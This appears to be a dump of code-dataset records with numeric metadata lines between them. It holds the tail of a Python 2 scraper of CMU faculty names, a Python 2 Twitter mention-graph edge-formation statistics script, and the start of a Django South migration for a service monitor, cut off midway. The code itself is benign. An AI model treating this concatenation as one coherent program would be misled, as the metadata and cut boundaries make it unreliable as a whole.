professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Machine Learning Department"))
research.appendChild(groupname)
for i in range(0,1):
url = 'https://www.cs.cmu.edu/directory/mld?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Robotics Institute"))
research.appendChild(groupname)
for i in range(0,2):
url = 'https://www.cs.cmu.edu/directory/ri?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
doc.writexml(fout_xml, "\t", "\t", "\n")
fout_xml.close()
| 46.77193
| 103
| 0.671293
| 940
| 7,998
| 5.639362
| 0.120213
| 0.05282
| 0.073948
| 0.029051
| 0.891341
| 0.891341
| 0.891341
| 0.886059
| 0.886059
| 0.876627
| 0
| 0.015897
| 0.182046
| 7,998
| 170
| 104
| 47.047059
| 0.794405
| 0.004751
| 0
| 0.730263
| 0
| 0
| 0.236646
| 0.05303
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.059211
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7184d69414ed7887162b067d591ac2913196fb5f
| 12,452
|
py
|
Python
|
src_graph/edge_formation_TOT_ST.py
|
sanja7s/SR_Twitter
|
2eb499c9aa25ba6e9860cd77eac6832890d2c126
|
[
"MIT"
] | null | null | null |
src_graph/edge_formation_TOT_ST.py
|
sanja7s/SR_Twitter
|
2eb499c9aa25ba6e9860cd77eac6832890d2c126
|
[
"MIT"
] | null | null | null |
src_graph/edge_formation_TOT_ST.py
|
sanja7s/SR_Twitter
|
2eb499c9aa25ba6e9860cd77eac6832890d2c126
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
from the month of edge formation, find the SR before, at the time and after
"""
from collections import defaultdict
import codecs
import os
import json
import numpy as np
from igraph import *
IN_DIR = "../../../DATA/General/"
os.chdir(IN_DIR)
F_IN = "mention/edge_formation_deletion_MOs.dat"
F_OUT = "mention/edge_formation_REL_ST_stats_STRICT.dat"
MONTHS = ["5", "6", "7", "8", "9", "10", "11"]
#########################
# read from a file that is an edge list with weights
#########################
def read_in_MO_graph(MO):
G = Graph.Read_Ncol('mention/' + MO + '_MENT_weight_dir_self_loops', directed=True, weights=True)
print G.summary()
return G
def read_in_MO_graph_MUTUAL_UNW(MO):
G = Graph.Read_Ncol('mention/' + MO + '_MENT_weight_dir_self_loops', directed=True, weights=True)
G.to_undirected(mode="mutual", combine_edges='ignore')
print G.summary()
return G
def extract_edge_formation_REL_ST_with_STDEV_POP():
MO_MENT = defaultdict(int)
for MO in MONTHS:
MO_MENT[MO] = read_in_MO_graph(MO).copy()
output_file = open(F_OUT, 'w')
cnt = 0
TOT_BEFORE = []
TOT_FORMATION = []
TOT_AFTER = []
with codecs.open(F_IN,'r', encoding='utf8') as input_file:
for line in input_file:
(userA, userB, MO_formation, MO_deletion) = line.split()
MO_formation = int(MO_formation)
MO_deletion = int(MO_deletion)
if MO_formation == 4 or MO_formation >= 10:
continue
# remove or no
if MO_deletion >= 6 and MO_deletion <= 10:
continue
cnt += 1
userA = int(userA)
userB = int(userB)
if userA < userB:
u1 = userA
u2 = userB
else:
u1 = userB
u2 = userA
MO_prior = MONTHS[int(MO_formation)-1-5]
MO_prior = str(MO_prior)
G = MO_MENT[MO_prior]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=IN, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(nB[0].index, mode=IN, weights='weight')
except IndexError:
popB = 0
prior = abs(popA + popB)
MO_formation = str(MO_formation)
G = MO_MENT[MO_formation]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=IN, weights='weight')
except IndexError:
popA = 0
print u1, u2, MO_formation
try:
popB = G.strength(nB[0].index, mode=IN, weights='weight')
except IndexError:
popB = 0
print u2, u1, MO_formation
formation = abs(popA + popB)
MO_after = MONTHS[int(MO_formation)+1-5]
MO_after = str(MO_after)
G = MO_MENT[MO_after]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=IN, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(nB[0].index, mode=IN, weights='weight')
except IndexError:
popB = 0
after = abs(popA + popB)
TOT_AFTER.append(after)
TOT_FORMATION.append(formation)
TOT_BEFORE.append(prior)
output_file.write(str(u1) + '\t' + str(u2) + '\t' + str(MO_formation) + '\t' + \
str(prior)+ '\t' + str(formation)+ '\t' + str(after) + '\n')
print "processed %d edges " % cnt
cnt = float(cnt)
TOT_BEFORE = np.array(TOT_BEFORE)
TOT_FORMATION = np.array(TOT_FORMATION)
TOT_AFTER = np.array(TOT_AFTER)
avg_bef = np.mean(TOT_BEFORE)
stdev_bef = np.std(TOT_BEFORE, dtype=np.float64)
avg_at = np.mean(TOT_FORMATION)
stdev_at = np.std(TOT_FORMATION, dtype=np.float64)
avg_aft = np.mean(TOT_AFTER)
stdev_aft = np.std(TOT_AFTER, dtype=np.float64)
print "Average REL POP %f and stdev %f before, at the time %f, %f and after %f, %f edges formation " % \
(avg_bef, stdev_bef, avg_at, stdev_at, avg_aft, stdev_aft)
print avg_bef, avg_at, avg_aft
print
print stdev_bef, stdev_at, stdev_aft
def extract_edge_formation_REL_ST_with_STDEV_ACT():
MO_MENT = defaultdict(int)
for MO in MONTHS:
MO_MENT[MO] = read_in_MO_graph(MO).copy()
output_file = open(F_OUT, 'w')
cnt = 0
TOT_BEFORE = []
TOT_FORMATION = []
TOT_AFTER = []
with codecs.open(F_IN,'r', encoding='utf8') as input_file:
for line in input_file:
(userA, userB, MO_formation, MO_deletion) = line.split()
MO_formation = int(MO_formation)
MO_deletion = int(MO_deletion)
if MO_formation == 4 or MO_formation >= 10:
continue
cnt += 1
userA = int(userA)
userB = int(userB)
if userA < userB:
u1 = userA
u2 = userB
else:
u1 = userB
u2 = userA
MO_prior = MONTHS[int(MO_formation)-1-5]
MO_prior = str(MO_prior)
G = MO_MENT[MO_prior]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=OUT, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(nB[0].index, mode=OUT, weights='weight')
except IndexError:
popB = 0
prior = abs(popA + popB)
MO_formation = str(MO_formation)
G = MO_MENT[MO_formation]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=OUT, weights='weight')
except IndexError:
popA = 0
print u1, u2, MO_formation
try:
popB = G.strength(nB[0].index, mode=OUT, weights='weight')
except IndexError:
popB = 0
print u2, u1, MO_formation
formation = abs(popA + popB)
MO_after = MONTHS[int(MO_formation)+1-5]
MO_after = str(MO_after)
G = MO_MENT[MO_after]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=OUT, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(nB[0].index, mode=OUT, weights='weight')
except IndexError:
popB = 0
after = abs(popA + popB)
TOT_AFTER.append(after)
TOT_FORMATION.append(formation)
TOT_BEFORE.append(prior)
output_file.write(str(u1) + '\t' + str(u2) + '\t' + str(MO_formation) + '\t' + \
str(prior)+ '\t' + str(formation)+ '\t' + str(after) + '\n')
print "processed %d edges " % cnt
cnt = float(cnt)
TOT_BEFORE = np.array(TOT_BEFORE)
TOT_FORMATION = np.array(TOT_FORMATION)
TOT_AFTER = np.array(TOT_AFTER)
avg_bef = np.mean(TOT_BEFORE)
stdev_bef = np.std(TOT_BEFORE, dtype=np.float64)
avg_at = np.mean(TOT_FORMATION)
stdev_at = np.std(TOT_FORMATION, dtype=np.float64)
avg_aft = np.mean(TOT_AFTER)
stdev_aft = np.std(TOT_AFTER, dtype=np.float64)
print "Average REL ST ACT %f and stdev %f before, at the time %f, %f and after %f, %f edges formation " % \
(avg_bef, stdev_bef, avg_at, stdev_at, avg_aft, stdev_aft)
print avg_bef, avg_at, avg_aft
print
print stdev_bef, stdev_at, stdev_aft
def extract_edge_formation_REL_ST_with_STDEV_MUTUAL_UNW():
MO_MENT = defaultdict(int)
for MO in MONTHS:
# strong
MO_MENT[MO] = read_in_MO_graph_MUTUAL_UNW(MO).copy()
# weak
#MO_MENT[MO] = read_in_MO_graph(MO).copy()
output_file = open(F_OUT, 'w')
cnt = 0
TOT_BEFORE = []
TOT_FORMATION = []
TOT_AFTER = []
with codecs.open(F_IN,'r', encoding='utf8') as input_file:
for line in input_file:
(userA, userB, MO_formation, MO_deletion) = line.split()
MO_formation = int(MO_formation)
MO_deletion = int(MO_deletion)
if MO_formation == 4 or MO_formation >= 10:
continue
# remove or no
if (MO_deletion <= 11):
continue
cnt += 1
userA = int(userA)
userB = int(userB)
if userA < userB:
u1 = userA
u2 = userB
else:
u1 = userB
u2 = userA
MO_prior = MONTHS[int(MO_formation)-1-5]
MO_prior = str(MO_prior)
G = MO_MENT[MO_prior]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
prior = abs(popA + popB)
MO_formation = str(MO_formation)
G = MO_MENT[MO_formation]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
print u1, u2, MO_formation
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
print u2, u1, MO_formation
formation = abs(popA + popB)
MO_after = MONTHS[int(MO_formation)+1-5]
MO_after = str(MO_after)
G = MO_MENT[MO_after]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
after = abs(popA + popB)
TOT_AFTER.append(after)
TOT_FORMATION.append(formation)
TOT_BEFORE.append(prior)
output_file.write(str(u1) + '\t' + str(u2) + '\t' + str(MO_formation) + '\t' + \
str(prior)+ '\t' + str(formation)+ '\t' + str(after) + '\n')
print "processed %d edges " % cnt
cnt = float(cnt)
TOT_BEFORE = np.array(TOT_BEFORE)
TOT_FORMATION = np.array(TOT_FORMATION)
TOT_AFTER = np.array(TOT_AFTER)
avg_bef = np.mean(TOT_BEFORE)
stdev_bef = np.std(TOT_BEFORE, dtype=np.float64)
avg_at = np.mean(TOT_FORMATION)
stdev_at = np.std(TOT_FORMATION, dtype=np.float64)
avg_aft = np.mean(TOT_AFTER)
stdev_aft = np.std(TOT_AFTER, dtype=np.float64)
print "Average REL ST MUTUAL CONTACTS %f and stdev %f before, at the time %f, %f and after %f, %f edges formation " % \
(avg_bef, stdev_bef, avg_at, stdev_at, avg_aft, stdev_aft)
print avg_bef, avg_at, avg_aft
print stdev_bef, stdev_at, stdev_aft
def extract_edge_formation_REL_ST_with_STDEV_TOTAL_UNW():
MO_MENT = defaultdict(int)
for MO in MONTHS:
# strong
#MO_MENT[MO] = read_in_MO_graph_MUTUAL_UNW(MO).copy()
# weak
MO_MENT[MO] = read_in_MO_graph(MO).copy()
output_file = open(F_OUT, 'w')
cnt = 0
TOT_BEFORE = []
TOT_FORMATION = []
TOT_AFTER = []
with codecs.open(F_IN,'r', encoding='utf8') as input_file:
for line in input_file:
(userA, userB, MO_formation, MO_deletion) = line.split()
MO_formation = int(MO_formation)
MO_deletion = int(MO_deletion)
if MO_formation == 4 or MO_formation >= 10:
continue
# remove or no
if (MO_deletion <= 11):
continue
cnt += 1
userA = int(userA)
userB = int(userB)
if userA < userB:
u1 = userA
u2 = userB
else:
u1 = userB
u2 = userA
MO_prior = MONTHS[int(MO_formation)-1-5]
MO_prior = str(MO_prior)
G = MO_MENT[MO_prior]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
prior = abs(popA + popB)
MO_formation = str(MO_formation)
G = MO_MENT[MO_formation]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
print u1, u2, MO_formation
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
print u2, u1, MO_formation
formation = abs(popA + popB)
MO_after = MONTHS[int(MO_formation)+1-5]
MO_after = str(MO_after)
G = MO_MENT[MO_after]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
after = abs(popA + popB)
TOT_AFTER.append(after)
TOT_FORMATION.append(formation)
TOT_BEFORE.append(prior)
output_file.write(str(u1) + '\t' + str(u2) + '\t' + str(MO_formation) + '\t' + \
str(prior)+ '\t' + str(formation)+ '\t' + str(after) + '\n')
print "processed %d edges " % cnt
cnt = float(cnt)
TOT_BEFORE = np.array(TOT_BEFORE)
TOT_FORMATION = np.array(TOT_FORMATION)
TOT_AFTER = np.array(TOT_AFTER)
avg_bef = np.mean(TOT_BEFORE)
stdev_bef = np.std(TOT_BEFORE, dtype=np.float64)
avg_at = np.mean(TOT_FORMATION)
stdev_at = np.std(TOT_FORMATION, dtype=np.float64)
avg_aft = np.mean(TOT_AFTER)
stdev_aft = np.std(TOT_AFTER, dtype=np.float64)
print "Average REL ST MUTUAL CONTACTS %f and stdev %f before, at the time %f, %f and after %f, %f edges formation " % \
(avg_bef, stdev_bef, avg_at, stdev_at, avg_aft, stdev_aft)
print avg_bef, avg_at, avg_aft
print stdev_bef, stdev_at, stdev_aft
print 'Strong contacts sum'
extract_edge_formation_REL_ST_with_STDEV_MUTUAL_UNW()
print 'Total contacts, including weak sum'
extract_edge_formation_REL_ST_with_STDEV_TOTAL_UNW()
| 26.325581
| 120
| 0.654674
| 2,005
| 12,452
| 3.870324
| 0.07581
| 0.073711
| 0.027835
| 0.040206
| 0.941108
| 0.939046
| 0.933505
| 0.93067
| 0.925129
| 0.912758
| 0
| 0.019485
| 0.204545
| 12,452
| 472
| 121
| 26.381356
| 0.763958
| 0.019997
| 0
| 0.932292
| 0
| 0.010417
| 0.072377
| 0.013363
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015625
| null | null | 0.078125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
71b3e0bb4cef92389930cf684f37f1c1c5e3e292
| 25,320
|
py
|
Python
|
src/selena/services/migrations/0001_initial.py
|
deejay1/selena
|
16189ee57c8197ab4375727ef8a905d4f4561eb7
|
[
"Apache-2.0"
] | 23
|
2015-01-10T18:17:58.000Z
|
2021-12-21T03:01:38.000Z
|
src/selena/services/migrations/0001_initial.py
|
deejay1/selena
|
16189ee57c8197ab4375727ef8a905d4f4561eb7
|
[
"Apache-2.0"
] | 20
|
2015-01-10T14:05:42.000Z
|
2016-08-09T07:48:50.000Z
|
src/selena/services/migrations/0001_initial.py
|
deejay1/selena
|
16189ee57c8197ab4375727ef8a905d4f4561eb7
|
[
"Apache-2.0"
] | 3
|
2015-01-10T18:27:30.000Z
|
2020-04-07T16:17:43.000Z
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Queue'
db.create_table(u'services_queue', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=75, db_index=True)),
))
db.send_create_signal(u'services', ['Queue'])
# Adding model 'Agent'
db.create_table(u'services_agent', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=75, db_index=True)),
('is_main', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
('is_active', self.gf('django.db.models.fields.BooleanField')(default=True, db_index=True)),
('queue', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['services.Queue'], null=True, on_delete=models.PROTECT, blank=True)),
('salt', self.gf('django.db.models.fields.CharField')(max_length=16)),
))
db.send_create_signal(u'services', ['Agent'])
# Adding model 'Service'
db.create_table(u'services_service', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200, db_index=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('response_code', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=200)),
('performance_issues_time', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=15)),
('connection_timeout', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=30)),
('performance_issues_min_probes_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=8)),
('service_not_working_min_probes_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=8)),
('time_delta', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=10)),
('base_useragent', self.gf('django.db.models.fields.CharField')(default=u'Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3', max_length=250)),
('base_referer', self.gf('django.db.models.fields.URLField')(default=u'', max_length=200, null=True, blank=True)),
('auth_user', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('auth_pass', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('is_active', self.gf('django.db.models.fields.BooleanField')(default=True, db_index=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, auto_now_add=True, blank=True)),
('is_technical_break', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
('is_core_service', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
('hosting', self.gf('django.db.models.fields.BooleanField')(default=False)),
('comments', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('order', self.gf('django.db.models.fields.PositiveIntegerField')(default=100)),
('sensitivity', self.gf('django.db.models.fields.DecimalField')(default='0.5', max_digits=3, decimal_places=2)),
('auth_method', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1, db_index=True)),
))
db.send_create_signal(u'services', ['Service'])
# Adding M2M table for field additional_agents on 'Service'
db.create_table(u'services_service_additional_agents', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('service', models.ForeignKey(orm[u'services.service'], null=False)),
('agent', models.ForeignKey(orm[u'services.agent'], null=False))
))
db.create_unique(u'services_service_additional_agents', ['service_id', 'agent_id'])
# Adding model 'MonitoredPhrase'
db.create_table(u'services_monitoredphrase', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('phrase', self.gf('django.db.models.fields.CharField')(max_length=250)),
('shall_not_be', self.gf('django.db.models.fields.BooleanField')(default=False)),
('is_active', self.gf('django.db.models.fields.BooleanField')(default=True, db_index=True)),
('service', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['services.Service'])),
))
db.send_create_signal(u'services', ['MonitoredPhrase'])
# Adding model 'AdditionalRequestParam'
db.create_table(u'services_additionalrequestparam', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=250)),
('useragent', self.gf('django.db.models.fields.CharField')(max_length=250, blank=True)),
('referer', self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True)),
('post', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('get', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('service', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['services.Service'])),
))
db.send_create_signal(u'services', ['AdditionalRequestParam'])
# Adding model 'ServiceHistory'
db.create_table(u'services_servicehistory', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('service_id', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('response_state', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1, db_index=True)),
('request_params_id', self.gf('django.db.models.fields.PositiveIntegerField')(null=True, blank=True)),
('agent_id', self.gf('django.db.models.fields.PositiveIntegerField')()),
('response_code', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('response_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('namelookup_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('connect_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('pretransfer_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('starttransfer_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('redirect_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('size_download', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('speed_download', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('redirect_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('num_connects', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, db_index=True, blank=True)),
('main_probe', self.gf('django.db.models.fields.PositiveIntegerField')(default=0, db_index=True)),
('tick_failed', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'services', ['ServiceHistory'])
# Adding model 'ServiceHistoryExtra'
db.create_table(u'services_servicehistoryextra', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('service_history_id', self.gf('django.db.models.fields.BigIntegerField')(db_index=True)),
('effective_url', self.gf('django.db.models.fields.URLField')(max_length=500, null=True, blank=True)),
('error_msg', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('wordchecks_errors', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
))
db.send_create_signal(u'services', ['ServiceHistoryExtra'])
# Adding model 'ServiceHistoryArchive'
db.create_table(u'services_servicehistoryarchive', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('service_id', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('agent_id', self.gf('django.db.models.fields.PositiveIntegerField')()),
('response_time', self.gf('django.db.models.fields.DecimalField')(max_digits=5, decimal_places=2)),
('namelookup_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('connect_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('pretransfer_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('starttransfer_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('redirect_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('size_download', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('speed_download', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('redirect_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('num_connects', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(db_index=True)),
))
db.send_create_signal(u'services', ['ServiceHistoryArchive'])
# BIGINT
db.execute("ALTER TABLE `services_servicehistory` CHANGE COLUMN `id` `id` BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT")
db.execute("ALTER TABLE `services_servicehistory` CHANGE `main_probe` `main_probe` BIGINT UNSIGNED NOT NULL")
db.execute("ALTER TABLE `services_servicehistoryarchive` CHANGE COLUMN `id` `id` BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT")
db.execute("ALTER TABLE `services_servicehistoryextra` CHANGE COLUMN `id` `id` BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT")
db.execute("ALTER TABLE `services_servicehistoryextra` CHANGE `service_history_id` `service_history_id` BIGINT UNSIGNED NOT NULL")
# PARTITIONS
db.execute("ALTER TABLE `services_servicehistory` DROP PRIMARY KEY , ADD PRIMARY KEY (`id`, `created`)")
db.execute("ALTER TABLE `services_servicehistory` CHANGE COLUMN `response_time` `response_time` DECIMAL(5,2) UNSIGNED NOT NULL , CHANGE COLUMN `namelookup_time` `namelookup_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `connect_time` `connect_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `pretransfer_time` `pretransfer_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `starttransfer_time` `starttransfer_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `redirect_time` `redirect_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `size_download` `size_download` INT(11) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `speed_download` `speed_download` INT(11) UNSIGNED NULL DEFAULT NULL")
db.execute("ALTER TABLE `services_servicehistoryarchive` CHANGE COLUMN `response_time` `response_time` DECIMAL(5,2) UNSIGNED NOT NULL , CHANGE COLUMN `namelookup_time` `namelookup_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `connect_time` `connect_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `pretransfer_time` `pretransfer_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `starttransfer_time` `starttransfer_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `redirect_time` `redirect_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `size_download` `size_download` INT(11) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `speed_download` `speed_download` INT(11) UNSIGNED NULL DEFAULT NULL")
db.execute("ALTER TABLE `services_servicehistoryarchive` DROP PRIMARY KEY , ADD PRIMARY KEY (`id`, `created`)")
db.execute("ALTER TABLE `services_servicehistory` PARTITION BY RANGE (TO_DAYS(created)) (PARTITION p_other VALUES LESS THAN (0))")
db.execute("ALTER TABLE `services_servicehistoryarchive` PARTITION BY RANGE (TO_DAYS(created)) (PARTITION p_other VALUES LESS THAN (0))")
def backwards(self, orm):
# Deleting model 'Queue'
db.delete_table(u'services_queue')
# Deleting model 'Agent'
db.delete_table(u'services_agent')
# Deleting model 'Service'
db.delete_table(u'services_service')
# Removing M2M table for field additional_agents on 'Service'
db.delete_table('services_service_additional_agents')
# Deleting model 'MonitoredPhrase'
db.delete_table(u'services_monitoredphrase')
# Deleting model 'AdditionalRequestParam'
db.delete_table(u'services_additionalrequestparam')
# Deleting model 'ServiceHistory'
db.delete_table(u'services_servicehistory')
# Deleting model 'ServiceHistoryExtra'
db.delete_table(u'services_servicehistoryextra')
# Deleting model 'ServiceHistoryArchive'
db.delete_table(u'services_servicehistoryarchive')
models = {
u'services.additionalrequestparam': {
'Meta': {'object_name': 'AdditionalRequestParam'},
'get': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'post': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'referer': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['services.Service']"}),
'useragent': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'})
},
u'services.agent': {
'Meta': {'object_name': 'Agent'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
